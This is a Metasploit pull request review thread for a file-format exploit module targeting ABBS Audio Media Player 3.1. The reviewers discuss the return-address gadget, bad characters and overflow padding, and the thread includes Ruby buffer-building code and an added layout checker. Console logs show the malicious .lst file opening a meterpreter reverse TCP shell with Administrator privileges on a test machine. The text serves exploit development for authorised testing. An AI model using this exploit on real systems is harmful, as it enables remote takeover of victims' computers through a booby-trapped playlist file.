
Added abbs amp exploit module #2038

Merged
merged 7 commits into rapid7:master from module-abbs-amp-exploit on Jul 2, 2013

Conversation

modpr0be
Contributor

This pull request is for an exploit module for ABBS Audio Media Player exploit posted on exploit-db with EDB-ID 25204.

[
[ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe
Contributor

Is "\x00" a badchar but can be used in the ret? I have not done the badchars analysis myself, just asking because it sounds strange.

Contributor Author

Ah yes, I forgot to remove the \x00 bad char. It doesn't affect the stack after all.

Contributor Author

After a bit of research, we still need the \x00 to be in the badChars list to make the exploit work. Please see my latest commit 478beee.

@jvazquez-r7
Contributor

On the other hand, tried on Windows XP SP3 / ABBS Audio Media Player 3.1 and it worked; comments should be discussed / fixed before we're able to land!:

msf exploit(abbs_amp_lst) > show options

Module options (exploit/windows/fileformat/abbs_amp_lst):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.lst          no        The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.172.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1


msf exploit(abbs_amp_lst) > rexploit
[*] Reloading module...

[+] msf.lst stored at /Users/juan/.msf4/local/msf.lst
msf exploit(abbs_amp_lst) > use exploit/multi/handler 
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.172.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:2371) at 2013-06-30 22:54:42 -0500

meterpreter > background
[*] Backgrounding session 1...

buffer = payload.encoded
buffer << rand_text(target['Offset'] - (payload.encoded.length))
buffer << [target.ret].pack('V')
buffer << rand_text_alpha_upper(800)
Contributor

Where did the 800 suffix padding length come from? And why is it not dependent on the length of anything else in the buffer?

Contributor Author

The 800 chars of padding was added to fill the buffer and trigger the overflow. Is there any nicer way to fill the buffer?

Contributor

Well, that would be clearer if you had a constant like OVERFLOW_LENGTH and then calculated the fill length by doing

overflow_fill = OVERFLOW_LENGTH - buffer.length
buffer << rand_text_alpha_upper(overflow_fill)

That way the overflow will always be correct if the encoded payload were shorter than expected for some reason. It would also let you experiment to see what the shortest length you can use to trigger the overflow is, so you can send a smaller exploit.

Contributor Author

Ah yes, ok I'll experiment with the buffer length and try to include your suggestion. Thanks! 👍

buffer = payload.encoded
buffer << rand_text(target['Offset'] - (payload.encoded.length))
buffer << [target.ret].pack('V')
buffer << rand_text(target['Max'] - buffer.length)
Contributor

And is it really needed? Sorry, but it doesn't look like a "standard" stack based buffer overflow, so I really would like to know if it's needed at all to get EIP control.

Contributor Author

Based on my last research, the module doesn't reach EIP if there's no additional buffer. But you're right, I rebooted the box and it works now. The last junk is not needed, as you said.
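
The two review points above (derive the fill length from a constant instead of hard-coding it, and keep \x00 in the bad-char list) as an added stand-alone Ruby example; this is not code from the PR or from Metasploit. OFFSET and the \x0a/\x0d bad chars are assumed values, the payload bytes are constructed placeholders, and only RET and the layout [payload][filler][ret] come from the thread.

```ruby
# Added example (not the module's code): build the .lst buffer with the fill
# computed from constants, then validate the layout before anything is written.
OFFSET    = 1024                              # assumed distance to the saved return address
RET       = 0x00412c91                        # add esp,14 # pop # pop # pop # ret from amp.exe (from the PR)
BAD_CHARS = ["\x00", "\x0a", "\x0d"].map(&:b) # \x00 as the author found; \x0a/\x0d are assumed

class LayoutError < StandardError; end

# [payload][filler up to OFFSET][RET] with no trailing junk, as agreed in the thread.
# Filler is deterministic here (rather than rand_text) so the result is checkable.
def build_buffer(encoded_payload, offset: OFFSET, ret: RET)
  size = encoded_payload.bytesize
  raise LayoutError, "payload (#{size} bytes) exceeds offset #{offset}" if size > offset
  buf = encoded_payload.b
  buf << ("A" * (offset - size))              # fill derived from the constant, never hard-coded
  buf << [ret].pack('V')                      # little-endian, same as the module
  buf
end

# Returns { problems: [...], warnings: [...] }; empty :problems means the layout is sound.
# Bad chars inside the ret are reported as warnings with their byte index, since the
# thread found the trailing null in RET acceptable; the reader judges that case.
def check_buffer(buf, offset: OFFSET, ret: RET, bad_chars: BAD_CHARS)
  problems, warnings = [], []
  body   = buf.byteslice(0, offset)
  packed = [ret].pack('V')
  bad_chars.each do |c|
    hex = c.unpack1('H*')
    problems << "bad char #{hex} in payload/filler" if body.include?(c)
    if (i = packed.index(c))
      warnings << "bad char #{hex} in ret at byte #{i}"
    end
  end
  problems << "ret not at offset #{offset}"   unless buf.byteslice(offset, 4) == packed
  problems << "trailing bytes after ret"      unless buf.bytesize == offset + 4
  { problems: problems, warnings: warnings }
end
```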

@jvazquez-r7
Contributor

Okay, testing again and landing if working! Thanks @modpr0be!

@jvazquez-r7
Contributor

Working:

msf exploit(abbs_amp_lst) > rexploit
[*] Reloading module...

[+] msf.lst stored at /Users/juan/.msf4/local/msf.lst
msf exploit(abbs_amp_lst) > use exploit/multi/handler 
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1033) at 2013-07-01 23:18:36 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > 

merging.

@jvazquez-r7 jvazquez-r7 merged commit 2e53984 into rapid7:master Jul 2, 2013
@modpr0be modpr0be deleted the module-abbs-amp-exploit branch July 2, 2013 04:56